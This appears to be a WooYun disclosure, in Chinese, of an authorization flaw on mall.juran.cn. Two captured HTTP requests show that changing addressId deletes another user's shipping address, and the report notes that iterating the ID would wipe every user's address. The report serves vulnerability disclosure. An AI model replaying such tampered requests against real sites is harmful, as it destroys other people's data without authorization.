WooYun.org

0X00收货地址管理（这个界面得先下单的时候填写默认收货地址才会出现）
http://mall.juran.cn/myspace/userinfo/taddresses.htm

0X01点击删除图标，截取删除的收货地址的接口
POST /myspace/userinfo/delete_trade_address.htm HTTP/1.1
Host: mall.juran.cn
Content-Length: 32
Accept: */*
Origin: http://mall.juran.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mall.juran.cn/myspace/userinfo/taddresses.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: XXXXXXXX
addressId=1088503&userId=1134073

0x02 遍历addressId即可删除所有用户的地址
0X03 我用了两个账户做测试（自己注册的）
账户A截图：

账户B截图：

0X04此时点击账户A的收货地址删除图标，拦截请求
POST /myspace/userinfo/delete_trade_address.htm HTTP/1.1
Host: mall.juran.cn
Content-Length: 32
Accept: */*
Origin: http://mall.juran.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mall.juran.cn/myspace/userinfo/taddresses.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: XXXXXXXX
addressId=1088502&userId=1134073

0X05 将addressId=1088502改为账户B的addressId=1088503，放行。我们刷新下账户B的页面，发现收货地址被删除，证明此处存在越权